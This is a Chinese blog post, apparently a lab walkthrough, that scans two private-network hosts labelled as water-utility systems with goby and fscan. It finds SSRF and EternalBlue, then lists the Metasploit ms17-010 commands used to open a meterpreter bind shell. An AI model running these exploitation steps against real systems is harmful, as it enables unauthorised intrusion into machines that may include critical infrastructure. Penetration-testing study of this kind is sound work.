漏洞扫描技术

最新推荐文章于 2024-09-14 08:06:25 发布
最新推荐文章于 2024-09-14 08:06:25 发布
阅读量305 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62552105/article/details/134873718
版权
本文介绍了使用goby和fscan对192.168.80.15和192.168.80.19的设备进行漏洞扫描,发现SSRF和永恒之蓝漏洞。进一步利用Metasploit(MSF)进行攻击,成功获取shell并获取系统信息。
摘要由CSDN通过智能技术生成

(一)、对水处理系统  192.168.80.15进行漏洞扫描

  1、使用goby对水处理系统(192.168.80.15)进行漏洞扫描,扫描结束可以发现有ssrf漏洞

  2、使用fscan进行扫描,在命令行输入fscan-main_Windows_x64.exe -h 192.168.80.15

 

(二)对广诚水利员工机 192.168.80.19进行漏洞扫描

   1、使用goby对广诚水利员工机(192.168.80.19)进行漏洞扫描,扫描结束可以发现有永恒之蓝漏洞

2、使用fscan进行扫描,在命令行输入fscan-main_Windows_x64.exe -h 192.168.80.19,同样发现发现有永恒之蓝漏洞

3、在kali中启动msf,search ms17 寻找模块

  4、use 0,查看options,设置rhosts和payload

  set rhosts 192.168.80.19

set payload windows/x64/meterpreter/bind_tcp

 5、run运行

  成功拿到shell,输入shell查看版本信息,输入whoami查看当前登录的用户信息

TIMETBT
关注
渗透测试常用武器分享 第四期(漏洞扫描)
渗透测试教程
05-22 1970
xray漏洞扫描 | 6.8k Star简介: 一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc点评: 可以用爬虫主动扫描,代理被动扫描。更新及时,官方不定期举办poc活动。配合登录态爬虫+被动扫描简直自动化神器,推荐!!地址: https://github.com/chaitin/xrayNuclei开源 | 漏洞扫描 | Golang | 8.2k Star简介: Nuclei使用零误报的定制模板向目标发送请求,同时可以对大量主机进行快速扫描
fscan
03-21
用于检测系统是否安全的软件主要扫描系统的漏洞.此软件系安全软件.如果被用于攻击系统,一概与本人无关.
一键全方位漏洞扫描工具Fscan
jennycisp的博客
12-21 2702
工欲善其事必先利其器。一款优秀的工具能帮助我们很快的完成目标。这不神器Fscan給大家呈上。
探索安全扫描新境界:fscan(李三藏版) 项目推荐
最新发布
gitblog_00318的博客
09-14 515
探索安全扫描新境界:fscan(李三藏版) 项目推荐 fscan-modify- 基于fscan作者1.8版本进行了修改,添加了许多poc和一些功能,具体详情在手册里 项目地址: https://gitcode.com/gh_mi...
内网主动信息收集之使用fscan进行漏洞扫描
热门推荐
m0_74220316的博客
11-22 1万+
下载链接:https://github.com/shadow1ng/fscan一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
漏洞扫描工具
qq_44021627的博客
07-03 1774
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。在浏览器配置代理,在浏览器扩展中搜索proxy SwitchyOmega并添加。按照如图设置,端口号设置一个平常不使用的,并设置一个名字,点击应用选项保存。从命令行进入安装xray的目录下,输入以下命令启动xray。打开浏览器代理,代理开启后xray会监听在此界面的网页。4.下载安装 proxifier。
计算机网络安全漏洞扫描技术的研究.pdf
09-26
计算机网络安全漏洞扫描技术的研究 计算机网络安全是指保护计算机系统、网络和数据免受未经授权的访问、使用、披露、修改或破坏的保护措施。漏洞扫描技术是检测和防止网络攻击的重要手段之一。该技术可以检测到...
网络漏洞扫描技术PPT课件
07-07
网络漏洞扫描技术网络安全领域的重要组成部分,它涉及到对计算机系统、网络设备、软件应用等潜在脆弱性的识别和评估。漏洞扫描技术的主要目的是发现网络中可能存在的安全漏洞,以便及时修补,防止恶意攻击者利用...
计算机网络安全漏洞扫描技术的应用研究.pdf
09-20
计算机网络安全漏洞扫描技术的应用研究.pdf
计算机网络安全漏洞扫描技术.pdf
09-20
漏洞扫描技术是检测和评估系统中潜在漏洞的过程,目的是发现并修复这些漏洞以增强系统的安全性。 漏洞扫描技术可以分为两种类型:被动扫描和主动扫描。被动扫描是在不干扰系统正常运行的情况下进行的,它通过分析...
内网综合扫描工具.zip
08-25
内网扫描工具
内网漏扫工具fscan
耕耘
07-27 1592
fscan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
安全人员必备内网漏扫工具——fscan是什么?并Win11安装fscan扫描工具、操作方法
wangluoanquan111的博客
03-05 9903
工作原理* 扫描端口。
漏洞扫描神器/漏洞扫描工具-零开始信息安全教程
程序员三九的博客
06-13 541
这里分享一款快捷、简单的安全漏洞扫描工具fscan,普通人都能使用,简单检测一下单位内部系统的安全漏洞。
红队快速打点工具-fscan
siu~
09-23 2544
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 该工具不仅只能用于内网,外网同样能够使用。
fscan的安装与使用
新雪兰
06-06 4176
直接下载exe文件就行。
漏洞扫描技术:端口服务扫描详解
"这篇资料主要介绍了端口服务扫描的两种主要类型——TCP connect扫描和TCP SYN扫描,并讨论了漏洞扫描技术的重要性和应用。" 在网络安全领域,漏洞扫描是至关重要的,它涉及到系统的安全性评估和防护。漏洞扫描技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值